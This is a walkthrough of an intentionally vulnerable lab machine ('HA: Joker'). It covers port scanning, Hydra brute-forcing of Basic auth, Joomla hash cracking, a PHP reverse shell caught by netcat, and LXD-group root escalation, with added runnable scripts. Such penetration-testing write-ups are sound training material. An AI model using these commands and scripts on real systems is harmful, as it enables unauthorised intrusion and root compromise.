This lab was developed for online penetration-testing practice. Solving it is not hard if you have a solid grounding in the basics of penetration testing. Let's start and see how to breach it.
1. Reconnaissance
1.1 Nmap
Using nmap to scan for open ports and identify the services behind them (the -A flag adds version detection, default scripts, OS detection and a traceroute):
nmap -Pn -A -oA nmap.initial 10.10.26.109
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 09:56 IST
Nmap scan report for 10.10.26.109
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 200.22 ms 10.11.0.1
2 201.05 ms 10.10.26.109
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.40 seconds
We find three open ports: 22 (OpenSSH 7.6p1) and two Apache 2.4.29 web servers on 80 and 8080. Port 8080 answers with 401 Unauthorized and a Basic-auth realm ("Please enter the password."), so it needs credentials before it will show anything.
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
This gives us two potential usernames: batman and joker.
The content of secret.txt also hints ("rock", "100 poor jokes") at 100 words of rockyou.txt as the password list for brute-forcing.
We save the potential usernames and a few case variants to user.txt, and the first and last 100 lines of rockyou.txt to first_100_pass.txt and last_100_pass.txt respectively.
Then we use Hydra with those lists against the Basic-auth realm on port 8080:
hydra -L user.txt -P first_100_pass.txt http-get://10.10.26.109:8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-01 10:22:52
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 600 login tries (l:6/p:100), ~38 tries per task
[DATA] attacking http-get://10.10.26.109:8080/
[8080][http-get] host: 10.10.26.109 login: joker password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-01 10:23:20
Hydra finds a valid pair within the 600 tries: joker : hannah. The warning about the missing page path is harmless here, since the realm protects / itself.
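As an added example (not commands from the original walkthrough), here is the list preparation the text describes, plus a helper that shows the Authorization header Hydra's http-get module sends for each guess, so a single hit can be confirmed by hand with curl. The wordlist path /usr/share/wordlists/rockyou.txt and the target URL follow the page; the RUN_BRUTE guard and the function names are assumptions of this example:

```shell
#!/bin/sh
# Added example, not the page's own commands: prepare user/password lists for
# the Basic-auth brute force and show what one guess looks like on the wire.
# Assumptions: rockyou.txt lives at /usr/share/wordlists/rockyou.txt, the
# target is http://10.10.26.109:8080/ as on the page, hydra and curl exist.

# Emit case variants of each seed username, one per line
# (batman -> batman, Batman, BATMAN), matching the six logins Hydra reported.
username_variants() {
    for u in "$@"; do
        lower=$(printf '%s' "$u" | tr 'A-Z' 'a-z')
        printf '%s\n' "$lower"
        printf '%s\n' "$(printf '%s' "$lower" | cut -c1 | tr 'a-z' 'A-Z')$(printf '%s' "$lower" | cut -c2-)"
        printf '%s\n' "$(printf '%s' "$lower" | tr 'a-z' 'A-Z')"
    done
}

# The Authorization header value for HTTP Basic auth: "Basic" + base64(user:pass).
# This is exactly what hydra's http-get module sends on every attempt.
basic_auth_header() {  # basic_auth_header <user> <pass>
    printf 'Basic %s' "$(printf '%s:%s' "$1" "$2" | base64 | tr -d '\n')"
}

# Write the first and last N lines of a wordlist to two files (the "100 jokes" hint).
split_wordlist() {  # split_wordlist <wordlist> <n> <first_out> <last_out>
    head -n "$2" "$1" > "$3"
    tail -n "$2" "$1" > "$4"
}

# Probe one credential pair against the realm and print the HTTP status code:
# 200 means the realm accepted it, 401 means it did not.
probe_basic_auth() {  # probe_basic_auth <url> <user> <pass>
    curl -s -o /dev/null -w '%{http_code}' \
        -H "Authorization: $(basic_auth_header "$2" "$3")" "$1"
}

# The network-touching part only runs on explicit opt-in (RUN_BRUTE=1), so the
# helpers above can be sourced and reused safely.
if [ "${RUN_BRUTE:-0}" = 1 ]; then
    username_variants batman joker > user.txt
    split_wordlist /usr/share/wordlists/rockyou.txt 100 first_100_pass.txt last_100_pass.txt
    hydra -L user.txt -P first_100_pass.txt http-get://10.10.26.109:8080/
    # Confirm the hit without hydra:
    probe_basic_auth http://10.10.26.109:8080/ joker hannah
fi
```

The helper makes the point that Basic auth carries the password reversibly in every request; anyone who can read the traffic on port 8080 (plain HTTP here) gets joker:hannah without brute-forcing anything.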
2.2 Port 8080
Logging in to port 8080 with the obtained credentials, we find a default Joomla template.
2.3 Nikto
Scanning the site with Nikto for known issues and interesting paths, passing the credentials with -id so it can get past the Basic-auth realm:
nikto -h http://10.10.26.109:8080/ -id joker:hannah
- Nikto v2.1.6
----------------------------------------------------------------------
+ Target IP: 10.10.26.109
+ Target Hostname: 10.10.26.109
+ Target Port: 8080
+ Start Time: 2022-04-01 10:27:18 (GMT5.5)
----------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ / - Requires Authentication for realm ' Please enter the password.'
+ Successfully authenticated to realm ' Please enter the password.' with user-supplied credentials.
line: /administrator/
+ "robots.txt" contains 14 entries which should be manually viewed.
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ /backup.zip: Potentially interesting backup/cert file found.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-04-01 10:46:51 (GMT5.5) (1173 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Two paths stand out: /robots.txt and /backup.zip.
/robots.txt
robots.txt is normally used to keep search engines from indexing parts of a site, which makes it a handy list of paths the owner would rather not have seen. Among its 14 entries, /administrator looks promising: it is the Joomla admin login.
/backup.zip
We can download backup.zip, but the archive is password protected.
Unzipping it with the password hannah (the same one reused for the Basic-auth realm) yields two directories, db and site, which mirror the layout on the target.
joomla.sql in the db directory contains the Joomla users table, including the admin username and its bcrypt password hash. We save the hash to pass_john.txt and crack it with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt pass_john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234 (?)
1g 0:00:00:08 DONE (2022-04-01 11:21) 0.1128g/s 115.8p/s 115.8c/s 115.8C/s cassandra..bulldogs
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show pass_john.txt
?:abcd1234
This gives us admin : abcd1234, which logs us into /administrator with full Joomla administrator rights.
3. Gaining Access
3.1 PHP-Reverse Shell
In the Joomla administrator, edit the "beez3" template and replace the contents of its index.php with /usr/share/webshells/php/php-reverse-shell.php from the attacking machine, changing $ip to the tun0 address and $port to the listener port.
Start a netcat listener on the attacker system before saving, then trigger the shell through the template preview.
Catch the connection and upgrade it to a PTY:
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.7.240] 35458
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
21:52:14 up 42 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
Running id shows that www-data is a member of the lxd group (gid 115), which is the privilege-escalation path on this box.
www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
4. Privilege Escalation
4.1 LXD Privilege Escalation
Linux Containers (LXC) is a lightweight, kernel-level virtualization technology. LXD is the daemon and management layer built on top of LXC (the same runtime Docker itself used in its early releases), and it runs as root on the host.
To escalate to root on this machine you need an LXD image on the target, so:
Download build-alpine to the attacking machine, build an Alpine image with it and transfer the resulting tarball to the target.
Import the image on the target, initialise a privileged container from it and mount the host's root filesystem into the container at /mnt/root.
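The two steps above as a runnable script, added here as an example; these are not the page's own commands, which the page does not reproduce. It assumes the build-alpine script from the saghul/lxd-alpine-builder repository on GitHub, that the attacker serves the tarball from 10.11.66.165 (the tun0 address seen in the netcat output) on port 8000 (an assumption), and that the tarball name is passed in because it depends on the Alpine release build-alpine fetches:

```shell
#!/bin/sh
# Added example (not from the original page): LXD group -> root, split into the
# attacker side (build and serve the image) and the target side (import, create
# a privileged container, mount the host's / inside it).
# Assumptions: build-alpine comes from https://github.com/saghul/lxd-alpine-builder,
# the attacker serves it on port 8000, and the tarball name is given as an argument.

# True when an `id` output line lists lxd among the supplementary groups.
in_lxd_group() {  # in_lxd_group "<output of id>"
    case "$1" in
        *"groups="*"(lxd)"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Attacker side: clone build-alpine, build an image tarball, serve the directory.
attacker_build_and_serve() {
    git clone https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder && sudo ./build-alpine
    python3 -m http.server 8000
}

# Target side: fetch the image and pivot through a privileged container.
# security.privileged=true drops user-namespace mapping, so root inside the
# container is uid 0 on the host; mounting / at /mnt/root then gives full
# read/write access to every host file, including /root/final.txt and /etc/shadow.
target_escalate() {  # target_escalate <attacker_ip> <image_tarball>
    cd /tmp
    wget "http://$1:8000/$2"
    lxd init --auto
    lxc image import "$2" --alias alpine
    lxc init alpine privesc -c security.privileged=true
    lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
    lxc start privesc
    lxc exec privesc -- /bin/sh
}

# Only run the escalation on explicit opt-in, and only if the group check passes.
if [ "${LXD_PRIVESC_RUN:-0}" = 1 ]; then
    if in_lxd_group "$(id)"; then
        target_escalate "${ATTACKER_IP:-10.11.66.165}" "${IMAGE:?set IMAGE to the built tarball name}"
    else
        echo "current user is not in the lxd group" >&2
        exit 1
    fi
fi
```

Defensively, the check in in_lxd_group is the same one to run during a host review: any non-administrative account listed in the lxd group has an unaudited path to root, so membership should be treated as equivalent to sudo ALL.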
Inside the container, change to /mnt/root, where the host's filesystem is mounted, and read the final flag:
~ # cd /mnt/root
/mnt/root # ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv swapfile sys tmp usr var vmlinuz vmlinuz.old
/mnt/root # cd root
/mnt/root/root # ls
final.txt
/mnt/root/root # cat final.txt
Any member of the local lxd group can escalate to root on the host, regardless of sudo rights and without entering a password: LXD runs as root and lets group members start privileged containers with arbitrary host paths mounted inside them, which is exactly what was done above.
The Alpine image used above was built by cloning the build-alpine repository from GitHub on the attacking machine and served to the target over a simple HTTP server.